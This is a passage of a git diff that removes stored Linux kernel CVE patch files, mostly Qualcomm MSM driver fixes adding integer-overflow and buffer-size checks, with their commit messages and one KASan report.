fdCk7CiAJfQogCisJaWYgKGJ1ZmNudF90ID4gKFVJTlRfTUFYCisJCQktIHNpemVvZihzdHJ1Y3QgYXZzX2NtZF9zaGFyZWRfbWVtX21hcF9yZWdpb25zKSkKKwkJCS8gc2l6ZW9mKHN0cnVjdCBhdnNfc2hhcmVkX21hcF9yZWdpb25fcGF5bG9hZCkpIHsKKwkJcHJfZXJyKCIlczogVW5zaWduZWQgSW50ZWdlciBPdmVyZmxvdy4gYnVmY250X3QgPSAldVxuIiwKKwkJCQlfX2Z1bmNfXywgYnVmY250X3QpOworCQlyZXR1cm4gLUVJTlZBTDsKKwl9CisKIAljbWRfc2l6ZSA9IHNpemVvZihzdHJ1Y3QgYXZzX2NtZF9zaGFyZWRfbWVtX21hcF9yZWdpb25zKQogCQkJKyAoc2l6ZW9mKHN0cnVjdCBhdnNfc2hhcmVkX21hcF9yZWdpb25fcGF5bG9hZCkKIAkJCQkJCQkqIGJ1ZmNudF90KTsKIAorCisJaWYgKGJ1ZmNudCA+IChVSU5UX01BWCAvIHNpemVvZihzdHJ1Y3QgYXNtX2J1ZmZlcl9ub2RlKSkpIHsKKwkJcHJfZXJyKCIlczogVW5zaWduZWQgSW50ZWdlciBPdmVyZmxvdy4gYnVmY250ID0gJXVcbiIsCisJCQkJX19mdW5jX18sIGJ1ZmNudCk7CisJCXJldHVybiAtRUlOVkFMOworCX0KKwogC
WJ1ZmZlcl9ub2RlID0ga3phbGxvYyhzaXplb2Yoc3RydWN0IGFzbV9idWZmZXJfbm9kZSkgKiBidWZjbnQsCiAJCQkJR0ZQX0tFUk5FTCk7CiAJaWYgKCFidWZmZXJfbm9kZSkgewo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch
deleted file mode 100644
index 83c190e0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 077614c9f2b9f9d062fed66e3ae7669937ea6b85 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 04 Nov 2016 14:35:58 +0800
-Subject: [PATCH] ASoC: soc: qdsp6: prevent risk of buffer overflow
-
-In case of large value for bufcnt,
-cmd_size may overflow. Buffer size allocated by cmd_size might
-be not as expected.
-Possible buffer overflow could happen.
-
-Backport reference:
- * Change-Id: I9556f18dd6a9fdf3f76c133ae75c04ecce171f08
- * CRs-Fixed: 1084210
-
-Change-Id: I93f820e0344bfa05dee6a3e83d84ef688e23f761
-Signed-off-by: Xiaojun Sang
-Signed-off-by: Adrian DC
----
-
-diff --git a/sound/soc/msm/qdsp6/q6asm.c b/sound/soc/msm/qdsp6/q6asm.c
-index 2cde92a..c3bcdcd 100644
---- a/sound/soc/msm/qdsp6/q6asm.c
-+++ b/sound/soc/msm/qdsp6/q6asm.c
-@@ -2893,7 +2893,7 @@
- void *payload = NULL;
- int rc = 0;
- int i = 0;
-- int cmd_size = 0;
-+ uint32_t cmd_size = 0;
-
- if (!ac || ac->apr == NULL || this_mmap.apr == NULL) {
- pr_err("APR handle NULL\n");
-@@ -2901,6 +2901,14 @@
- }
- pr_debug("%s: Session[%d]\n", __func__, ac->session);
-
-+ if (bufcnt > (UINT_MAX
-+ - sizeof(struct asm_stream_cmd_memory_map_regions))
-+ / sizeof(struct asm_memory_map_regions)) {
-+ pr_err("%s: Unsigned Integer Overflow. bufcnt = %u\n",
-+ __func__, bufcnt);
-+ return -EINVAL;
-+ }
-+
- cmd_size = sizeof(struct asm_stream_cmd_memory_map_regions)
- + sizeof(struct asm_memory_map_regions) * bufcnt;
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch.base64
deleted file mode 100644
index 79fda34b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0611/3.4/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0611/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0611/4.4/0003.patch deleted file mode 100644 index 8b91f89a..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0611/4.4/0003.patch +++ /dev/null 
@@ -1,59 +0,0 @@
-From 1aa5df9246557a98181f03e98530ffd509b954c8 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 4 Nov 2016 14:35:58 +0800
-Subject: ASoC: soc: prevent risk of buffer overflow
-
-In case of large value for bufcnt_t or bufcnt,
-cmd_size may overflow. Buffer size allocated by cmd_size might
-be not as expected.
-Possible buffer overflow could happen.
-
-CRs-Fixed: 1084210
-Change-Id: I9556f18dd6a9fdf3f76c133ae75c04ecce171f08
-Signed-off-by: Xiaojun Sang
----
- sound/soc/msm/qdsp6v2/q6asm.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 0ea94cb..fe34f92f 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -5846,7 +5846,7 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir,
- struct asm_buffer_node *buffer_node = NULL;
- int rc = 0;
- int i = 0;
-- int cmd_size = 0;
-+ uint32_t cmd_size = 0;
- uint32_t bufcnt_t;
- uint32_t bufsz_t;
-
-@@ -5868,10 +5868,25 @@ static int q6asm_memory_map_regions(struct audio_client *ac, int dir,
- bufsz_t = PAGE_ALIGN(bufsz_t);
- }
-
-+ if (bufcnt_t > (UINT_MAX
-+ - sizeof(struct avs_cmd_shared_mem_map_regions))
-+ / sizeof(struct avs_shared_map_region_payload)) {
-+ pr_err("%s: Unsigned Integer Overflow. bufcnt_t = %u\n",
-+ __func__, bufcnt_t);
-+ return -EINVAL;
-+ }
-+
- cmd_size = sizeof(struct avs_cmd_shared_mem_map_regions)
- + (sizeof(struct avs_shared_map_region_payload)
- * bufcnt_t);
-
-+
-+ if (bufcnt > (UINT_MAX / sizeof(struct asm_buffer_node))) {
-+ pr_err("%s: Unsigned Integer Overflow. bufcnt = %u\n",
-+ __func__, bufcnt);
-+ return -EINVAL;
-+ }
-+
- buffer_node = kzalloc(sizeof(struct asm_buffer_node) * bufcnt,
- GFP_KERNEL);
- if (!buffer_node) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0612/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0612/ANY/0001.patch
deleted file mode 100644
index 208568f4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0612/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 05efafc998dc86c3b75af9803ca71255ddd7a8eb Mon Sep 17 00:00:00 2001
-From: Brahmaji K
-Date: Tue, 13 Dec 2016 20:32:24 +0530
-Subject: msm-3.18: drivers : added validation of input/output buffer sizes
-
-This change fixes issues reagrding the ioctl
-QSEECOM_IOCTL_MDTP_CIPHER_DIP_REQ uncovered by fuzzy tests.
-Modified handler of above ioctl, not to allow input/output
-buffer sizes greater than a fixed defined size.
-
-Change-Id: I69f94a29d939341564f6f3ebfda48fceaa934542
-Signed-off-by: Brahmaji K
----
- drivers/misc/qseecom.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index baea36b..34b70fd 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -80,6 +80,9 @@
- /* Encrypt/Decrypt Data Integrity Partition (DIP) for MDTP */
- #define SCM_MDTP_CIPHER_DIP 0x01
-
-+/* Maximum Allowed Size (128K) of Data Integrity Partition (DIP) for MDTP */
-+#define MAX_DIP 0x20000
-+
- #define RPMB_SERVICE 0x2000
- #define SSD_SERVICE 0x3000
-
-@@ -6029,7 +6032,8 @@ static int qseecom_mdtp_cipher_dip(void __user *argp)
- }
-
- if (req.in_buf == NULL || req.out_buf == NULL ||
-- req.in_buf_size == 0 || req.out_buf_size == 0 ||
-+ req.in_buf_size == 0 || req.in_buf_size > MAX_DIP ||
-+ req.out_buf_size == 0 || req.out_buf_size > MAX_DIP ||
- req.direction > 1) {
- pr_err("invalid parameters\n");
- ret = -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0613/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0613/ANY/0001.patch
deleted file mode 100644
index 2ceef3d9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0613/ANY/0001.patch
+++ /dev/null
@@ -1,217 +0,0 @@
-From b108c651cae9913da1ab163cb4e5f7f2db87b747 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Wed, 11 Jan 2017 12:12:31 -0800
-Subject: qseecom: improve input validatation for qseecom_send_service_cmd
-
-Make change to improve input validation on request and response
-buffers' address and length for qseecom_send_service_cmd.
-
-Change-Id: I047e3264333d767541e43b7dadd1727232fd48ef
-Signed-off-by: Zhen Kong
----
- drivers/misc/qseecom.c | 152 ++++++++++++++++++++++++++++---------------------
- 1 file changed, 88 insertions(+), 64 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 20949487..5e37cd6 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1,6 +1,6 @@
- /*Qualcomm Secure Execution Environment Communicator (QSEECOM) driver
- *
-- * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -2634,11 +2634,6 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- return -EINVAL;
- }
-
-- if ((!req_ptr->cmd_req_buf) || (!req_ptr->resp_buf)) {
-- pr_err("Invalid req/resp buffer, exiting\n");
-- return -EINVAL;
-- }
--
- /* Clients need to ensure req_buf is at base offset of shared buffer */
- if ((uintptr_t)req_ptr->cmd_req_buf !=
- data_ptr->client.user_virt_sb_base) {
-@@ -2646,15 +2641,11 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- return -EINVAL;
- }
-
-- if (((uintptr_t)req_ptr->resp_buf <
-- data_ptr->client.user_virt_sb_base) ||
-- ((uintptr_t)req_ptr->resp_buf >=
-- (data_ptr->client.user_virt_sb_base +
-- data_ptr->client.sb_length))){
-- pr_err("response buffer address not within shared bufffer\n");
-+ if (data_ptr->client.sb_length <
-+ sizeof(struct qseecom_rpmb_provision_key)) {
-+ pr_err("shared buffer is too small to hold key type\n");
- return -EINVAL;
- }
--
- req_buf = data_ptr->client.sb_virt;
-
- send_svc_ireq_ptr->qsee_cmd_id = req_ptr->cmd_id;
-@@ -2681,36 +2672,6 @@ int __qseecom_process_fsm_key_svc_cmd(struct qseecom_dev_handle *data_ptr,
- return -EINVAL;
- }
-
-- if (((uintptr_t)req_ptr->cmd_req_buf <
-- data_ptr->client.user_virt_sb_base) ||
-- ((uintptr_t)req_ptr->cmd_req_buf >=
-- (data_ptr->client.user_virt_sb_base +
-- data_ptr->client.sb_length))) {
-- pr_err("cmd buffer address not within shared bufffer\n");
-- return -EINVAL;
-- }
--
-- if (((uintptr_t)req_ptr->resp_buf <
-- data_ptr->client.user_virt_sb_base) ||
-- ((uintptr_t)req_ptr->resp_buf >=
-- (data_ptr->client.user_virt_sb_base +
-- data_ptr->client.sb_length))){
-- pr_err("response buffer address not within shared bufffer\n");
-- return -EINVAL;
-- }
--
-- if ((req_ptr->cmd_req_len == 0) || (req_ptr->resp_len == 0) ||
-- req_ptr->cmd_req_len > data_ptr->client.sb_length ||
-- req_ptr->resp_len > data_ptr->client.sb_length) {
-- pr_err("cmd buffer length or response buffer length not valid\n");
-- return -EINVAL;
-- }
--
-- if (req_ptr->cmd_req_len > UINT_MAX - req_ptr->resp_len) {
-- pr_err("Integer overflow detected in req_len & rsp_len, exiting now\n");
-- return -EINVAL;
-- }
--
- reqd_len_sb_in = req_ptr->cmd_req_len + req_ptr->resp_len;
- if (reqd_len_sb_in > data_ptr->client.sb_length) {
- pr_err("Not enough memory to fit cmd_buf and resp_buf. ");
-@@ -2732,28 +2693,11 @@ int __qseecom_process_fsm_key_svc_cmd(struct qseecom_dev_handle *data_ptr,
- return ret;
- }
-
--static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
-- void __user *argp)
-+static int __validate_send_service_cmd_inputs(struct qseecom_dev_handle *data,
-+ struct qseecom_send_svc_cmd_req *req)
- {
-- int ret = 0;
-- struct qseecom_client_send_service_ireq send_svc_ireq;
-- struct qseecom_client_send_fsm_key_req send_fsm_key_svc_ireq;
-- struct qseecom_command_scm_resp resp;
-- struct qseecom_send_svc_cmd_req req;
-- void *send_req_ptr;
-- size_t req_buf_size;
--
-- /*struct qseecom_command_scm_resp resp;*/
--
-- if (copy_from_user(&req,
-- (void __user *)argp,
-- sizeof(req))) {
-- pr_err("copy_from_user failed\n");
-- return -EFAULT;
-- }
--
-- if ((req.resp_buf == NULL) || (req.cmd_req_buf == NULL)) {
-- pr_err("cmd buffer or response buffer is null\n");
-+ if (!req || !req->resp_buf || !req->cmd_req_buf) {
-+ pr_err("req or cmd buffer or response buffer is null\n");
- return -EINVAL;
- }
-
-@@ -2777,6 +2721,86 @@ static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
- return -EINVAL;
- }
-
-+ if (((uintptr_t)req->cmd_req_buf <
-+ data->client.user_virt_sb_base) ||
-+ ((uintptr_t)req->cmd_req_buf >=
-+ (data->client.user_virt_sb_base + data->client.sb_length))) {
-+ pr_err("cmd buffer address not within shared bufffer\n");
-+ return -EINVAL;
-+ }
-+ if (((uintptr_t)req->resp_buf <
-+ data->client.user_virt_sb_base) ||
-+ ((uintptr_t)req->resp_buf >=
-+ (data->client.user_virt_sb_base + data->client.sb_length))) {
-+ pr_err("response buffer address not within shared bufffer\n");
-+ return -EINVAL;
-+ }
-+ if ((req->cmd_req_len == 0) || (req->resp_len == 0) ||
-+ (req->cmd_req_len > data->client.sb_length) ||
-+ (req->resp_len > data->client.sb_length)) {
-+ pr_err("cmd buf length or response buf length not valid\n");
-+ return -EINVAL;
-+ }
-+ if (req->cmd_req_len > UINT_MAX - req->resp_len) {
-+ pr_err("Integer overflow detected in req_len & rsp_len\n");
-+ return -EINVAL;
-+ }
-+
-+ if ((req->cmd_req_len + req->resp_len) > data->client.sb_length) {
-+ pr_debug("Not enough memory to fit cmd_buf.\n");
-+ pr_debug("resp_buf. Required: %u, Available: %zu\n",
-+ (req->cmd_req_len + req->resp_len),
-+ data->client.sb_length);
-+ return -ENOMEM;
-+ }
-+ if ((uintptr_t)req->cmd_req_buf > (ULONG_MAX - req->cmd_req_len)) {
-+ pr_err("Integer overflow in req_len & cmd_req_buf\n");
-+ return -EINVAL;
-+ }
-+ if ((uintptr_t)req->resp_buf > (ULONG_MAX - req->resp_len)) {
-+ pr_err("Integer overflow in resp_len & resp_buf\n");
-+ return -EINVAL;
-+ }
-+ if (data->client.user_virt_sb_base >
-+ (ULONG_MAX - data->client.sb_length)) {
-+ pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
-+ return -EINVAL;
-+ }
-+ if ((((uintptr_t)req->cmd_req_buf + req->cmd_req_len) >
-+ ((uintptr_t)data->client.user_virt_sb_base +
-+ data->client.sb_length)) ||
-+ (((uintptr_t)req->resp_buf + req->resp_len) >
-+ ((uintptr_t)data->client.user_virt_sb_base +
-+ data->client.sb_length))) {
-+ pr_err("cmd buf or resp buf is out of shared buffer region\n");
-+ return -EINVAL;
-+ }
-+ return 0;
-+}
-+
-+static int qseecom_send_service_cmd(struct qseecom_dev_handle *data,
-+ void __user *argp)
-+{
-+ int ret = 0;
-+ struct qseecom_client_send_service_ireq send_svc_ireq;
-+ struct qseecom_client_send_fsm_key_req send_fsm_key_svc_ireq;
-+ struct qseecom_command_scm_resp resp;
-+ struct qseecom_send_svc_cmd_req req;
-+ void *send_req_ptr;
-+ size_t req_buf_size;
-+
-+ /*struct qseecom_command_scm_resp resp;*/
-+
-+ if (copy_from_user(&req,
-+ (void __user *)argp,
-+ sizeof(req))) {
-+ pr_err("copy_from_user failed\n");
-+ return -EFAULT;
-+ }
-+
-+ if (__validate_send_service_cmd_inputs(data, &req))
-+ return -EINVAL;
-+
- data->type = QSEECOM_SECURE_SERVICE;
-
- switch (req.cmd_id) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0614/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0614/ANY/0001.patch
deleted file mode 100644
index d301f854..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0614/ANY/0001.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From fc2ae27eb9721a0ce050c2062734fec545cda604 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Thu, 20 Oct 2016 17:34:20 -0700
-Subject: qseecom: check buffer size when loading firmware images
-
-Make change in __qseecom_load_fw() and qseecom_load_commonlib_image()
-to check buffer size before copying img to buffer.
-
-CRs-fixed: 1080290
-Change-Id: I0f48666ac948a9571e249598ae7cc19df9036b1d
-Signed-off-by: Zhen Kong
----
- drivers/misc/qseecom.c | 32 +++++++++++++++++++++++++++-----
- 1 file changed, 27 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 061bc99..dc20841 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -3590,7 +3590,7 @@ static bool __qseecom_is_fw_image_valid(const struct firmware *fw_entry)
- return true;
- }
-
--static int __qseecom_get_fw_size(char *appname, uint32_t *fw_size,
-+static int __qseecom_get_fw_size(const char *appname, uint32_t *fw_size,
- uint32_t *app_arch)
- {
- int ret = -1;
-@@ -3628,14 +3628,21 @@ static int __qseecom_get_fw_size(char *appname, uint32_t *fw_size,
- }
- pr_debug("QSEE %s app, arch %u\n", appname, *app_arch);
- release_firmware(fw_entry);
-+ fw_entry = NULL;
- for (i = 0; i < num_images; i++) {
- memset(fw_name, 0, sizeof(fw_name));
- snprintf(fw_name, ARRAY_SIZE(fw_name), "%s.b%02d", appname, i);
- ret = request_firmware(&fw_entry, fw_name, qseecom.pdev);
- if (ret)
- goto err;
-+ if (*fw_size > U32_MAX - fw_entry->size) {
-+ pr_err("QSEE %s app file size overflow\n", appname);
-+ ret = -EINVAL;
-+ goto err;
-+ }
- *fw_size += fw_entry->size;
- release_firmware(fw_entry);
-+ fw_entry = NULL;
- }
-
- return ret;
-@@ -3646,8 +3653,9 @@ err:
- return ret;
- }
-
--static int __qseecom_get_fw_data(char *appname, u8 *img_data,
-- struct qseecom_load_app_ireq *load_req)
-+static int __qseecom_get_fw_data(const char *appname, u8 *img_data,
-+ uint32_t fw_size,
-+ struct qseecom_load_app_ireq *load_req)
- {
- int ret = -1;
- int i = 0, rc = 0;
-@@ -3667,6 +3675,12 @@ static int __qseecom_get_fw_data(char *appname, u8 *img_data,
- }
-
- load_req->img_len = fw_entry->size;
-+ if (load_req->img_len > fw_size) {
-+ pr_err("app %s size %zu is larger than buf size %u\n",
-+ appname, fw_entry->size, fw_size);
-+ ret = -EINVAL;
-+ goto err;
-+ }
- memcpy(img_data_ptr, fw_entry->data, fw_entry->size);
- img_data_ptr = img_data_ptr + fw_entry->size;
- load_req->mdt_len = fw_entry->size; /*Get MDT LEN*/
-@@ -3685,6 +3699,7 @@ static int __qseecom_get_fw_data(char *appname, u8 *img_data,
- goto err;
- }
- release_firmware(fw_entry);
-+ fw_entry = NULL;
- for (i = 0; i < num_images; i++) {
- snprintf(fw_name, ARRAY_SIZE(fw_name), "%s.b%02d", appname, i);
- ret = request_firmware(&fw_entry, fw_name, qseecom.pdev);
-@@ -3692,10 +3707,17 @@ static int __qseecom_get_fw_data(char *appname, u8 *img_data,
- pr_err("Failed to locate blob %s\n", fw_name);
- goto err;
- }
-+ if ((fw_entry->size > U32_MAX - load_req->img_len) ||
-+ (fw_entry->size + load_req->img_len > fw_size)) {
-+ pr_err("Invalid file size for %s\n", fw_name);
-+ ret = -EINVAL;
-+ goto err;
-+ }
- memcpy(img_data_ptr, fw_entry->data, fw_entry->size);
- img_data_ptr = img_data_ptr + fw_entry->size;
- load_req->img_len += fw_entry->size;
- release_firmware(fw_entry);
-+ fw_entry = NULL;
- }
- return ret;
- err:
-@@ -3800,7 +3822,7 @@ static int __qseecom_load_fw(struct qseecom_dev_handle *data, char *appname)
- if (ret)
- return ret;
-
-- ret = __qseecom_get_fw_data(appname, img_data, &load_req);
-+ ret = __qseecom_get_fw_data(appname, img_data, fw_size, &load_req);
- if (ret) {
- ret = -EIO;
- goto exit_free_img_data;
-@@ -3921,7 +3943,7 @@ static int qseecom_load_commonlib_image(struct qseecom_dev_handle *data,
- if (ret)
- return -EIO;
-
-- ret = __qseecom_get_fw_data(cmnlib_name, img_data, &load_req);
-+ ret = __qseecom_get_fw_data(cmnlib_name, img_data, fw_size, &load_req);
- if (ret) {
- ret = -EIO;
- goto exit_free_img_data;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0619/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0619/ANY/0001.patch
deleted file mode 100644
index 3fa4fcc0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0619/ANY/0001.patch
+++ /dev/null
@@ -1,113 +0,0 @@
-From 72f67b29a9c5e6e8d3c34751600c749c5f5e13e1 Mon Sep 17 00:00:00 2001
-From: David Keitel
-Date: Thu, 16 Apr 2015 16:26:28 -0700
-Subject: pinctrl: msm: fix function name allocation length
-
-Currently pinctrl driver allocates with the length
-following calculation:
-
- length = strlen(grp_name) + strlen("-func").
-
-However, this does not take into account for the string
-terminating character which is used in the subsequent
-snprintf and causes KASan to trigger a bug report:
-
-=============================================================================
-BUG kmalloc-64 (Tainted: G B ): kasan: bad access detected
------------------------------------------------------------------------------
-
-INFO: Slab 0xffffffbc065fb940 objects=64 used=64 fp=0x (null) flags=0x0080
-INFO: Object 0xffffffc0a32c24c0 @offset=1216 fp=0x6365632d696d6468
-
-Bytes b4 ffffffc0a32c24b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffffffc0a32c24c0: 68 64 6d 69 2d 63 65 63 2d 70 69 6e 73 2d 66 75 hdmi-cec-pins-fu
-Object ffffffc0a32c24d0: 6e 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 nc..............
-Object ffffffc0a32c24e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffffffc0a32c24f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-CPU: 0 PID: 1 Comm: swapper/0 Tainted: G B 3.10.49-g465b172-00127-g2b70c1d-dirty #119
-Call trace:
-[] dump_backtrace+0x0/0x1d4
-[] show_stack+0x10/0x1c
-[] dump_stack+0x1c/0x28
-[] print_trailer+0x144/0x158
-[] object_err+0x38/0x4c
-[] kasan_report_error+0x210/0x3b0
-[] kasan_report+0x5c/0x68
-[] __asan_store1+0x70/0x7c
-[] vsnprintf+0x644/0x69c
-[] snprintf+0x94/0xb0
-[] msm_dt_node_to_map+0x2cc/0x378
-[] pinctrl_dt_to_map+0x32c/0x424
-[] pinctrl_get+0x1b0/0x53c
-[] devm_pinctrl_get+0x34/0x80
-[] pinctrl_bind_pins+0x44/0x1b4
-[] driver_probe_device+0x188/0x47c
-[] __driver_attach+0x88/0xc0
-[] bus_for_each_dev+0xdc/0x11c
-[] driver_attach+0x2c/0x3c
-[] bus_add_driver+0x1bc/0x32c
-[] driver_register+0x10c/0x1d8
-[] platform_driver_register+0x98/0xa8
-[] hdmi_tx_drv_init+0x18/0x4c
-[] do_one_initcall+0xcc/0x188
-[] kernel_init_freeable+0x1c0/0x264
-[] kernel_init+0x10/0xcc
-Memory state around the buggy address:
- ffffffc0a32c2380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffffffc0a32c2400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
->ffffffc0a32c2480: fb fb fb fb fb fb fb fb 00 00 02 fc fc fc fc fc
- ^
- ffffffc0a32c2500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ffffffc0a32c2580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-==================================================================
-
-Fix this by increasing the allocation to length + 1
-
-CRs-Fixed: 826566
-Change-Id: Ied04500e6b0c0187b2bea0cfaa9adb4080c2f614
-Signed-off-by: David Keitel
-Signed-off-by: Stepan Moskovchenko
----
- drivers/pinctrl/msm/pinctrl-msm.c | 11 ++++++-----
- 1 file changed, 6 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/pinctrl/msm/pinctrl-msm.c b/drivers/pinctrl/msm/pinctrl-msm.c
-index b3b97a8..07f7b43 100644
---- a/drivers/pinctrl/msm/pinctrl-msm.c
-+++ b/drivers/pinctrl/msm/pinctrl-msm.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -293,6 +293,7 @@ static int msm_dt_node_to_map(struct pinctrl_dev *pctldev,
- char *fn_name;
- u32 val;
- unsigned long *cfg;
-+ unsigned int fn_name_len = 0;
- int cfg_cnt = 0, map_cnt = 0, func_cnt = 0, ret = 0;
-
- dd = pinctrl_dev_get_drvdata(pctldev);
-@@ -338,14 +339,14 @@ static int msm_dt_node_to_map(struct pinctrl_dev *pctldev,
- }
- /* Get function mapping */
- of_property_read_u32(parent, "qcom,pin-func", &val);
-- fn_name = kzalloc(strlen(grp_name) + strlen("-func"),
-- GFP_KERNEL);
-+
-+ fn_name_len = strlen(grp_name) + strlen("-func") + 1;
-+ fn_name = kzalloc(fn_name_len, GFP_KERNEL);
- if (!fn_name) {
- ret = -ENOMEM;
- goto func_err;
- }
-- snprintf(fn_name, strlen(grp_name) + strlen("-func") + 1, "%s%s",
-- grp_name, "-func");
-+ snprintf(fn_name, fn_name_len, "%s-func", grp_name);
- map[*nmaps].data.mux.group = grp_name;
- map[*nmaps].data.mux.function = fn_name;
- map[*nmaps].type = PIN_MAP_TYPE_MUX_GROUP;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0620/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0620/ANY/0001.patch
deleted file mode 100644
index 01ce7bb0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0620/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 01b2c9a5d728ff6f2f1f28a5d4e927aaeabf56ed Mon Sep 17 00:00:00 2001
-From: Satya Durga Srinivasu Prabhala
-Date: Tue, 25 Oct 2016 16:35:23 -0700
-Subject: soc: qcom: scm: add check to avoid buffer overflow
-
-There is a posibility of a buffer overflow in scm_call,
-add check to avoid the same.
-
-Change-Id: Iee908c56ec530569b35dafa060139e0428efc781
-Signed-off-by: Satya Durga Srinivasu Prabhala
----
- drivers/soc/qcom/scm.c | 18 ++++++++++++------
- 1 file changed, 12 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/soc/qcom/scm.c b/drivers/soc/qcom/scm.c
-index 714c848..b4713ac 100644
---- a/drivers/soc/qcom/scm.c
-+++ b/drivers/soc/qcom/scm.c
-@@ -56,9 +56,16 @@ DEFINE_MUTEX(scm_lmh_lock);
- #define SMC_ATOMIC_MASK 0x80000000
- #define IS_CALL_AVAIL_CMD 1
-
--#define SCM_BUF_LEN(__cmd_size, __resp_size) \
-- (sizeof(struct scm_command) + sizeof(struct scm_response) + \
-- __cmd_size + __resp_size)
-+#define SCM_BUF_LEN(__cmd_size, __resp_size) ({ \
-+ size_t x = __cmd_size + __resp_size; \
-+ size_t y = sizeof(struct scm_command) + sizeof(struct scm_response); \
-+ size_t result; \
-+ if (x < __cmd_size || (x + y) < x) \
-+ result = 0; \
-+ else \
-+ result = x + y; \
-+ result; \
-+ })
- /**
- * struct scm_command - one SCM command buffer
- * @len: total available memory for command and response
-@@ -356,8 +363,7 @@ int scm_call_noalloc(u32 svc_id, u32 cmd_id, const void *cmd_buf,
- int ret;
- size_t len = SCM_BUF_LEN(cmd_len, resp_len);
-
-- if (cmd_len > scm_buf_len || resp_len > scm_buf_len ||
-- len > scm_buf_len)
-+ if (len == 0)
- return -EINVAL;
-
- if (!IS_ALIGNED((unsigned long)scm_buf, PAGE_SIZE))
-@@ -780,7 +786,7 @@ int scm_call(u32 svc_id, u32 cmd_id, const void *cmd_buf, size_t cmd_len,
- int ret;
- size_t len = SCM_BUF_LEN(cmd_len, resp_len);
-
-- if (cmd_len > len || resp_len > len)
-+ if (len == 0 || PAGE_ALIGN(len) < len)
- return -EINVAL;
-
- cmd = kzalloc(PAGE_ALIGN(len), GFP_KERNEL);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0621/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0621/ANY/0001.patch
deleted file mode 100644
index 996392f2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0621/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 9656e2c2b3523af20502bf1e933e35a397f5e82f Mon Sep 17 00:00:00 2001
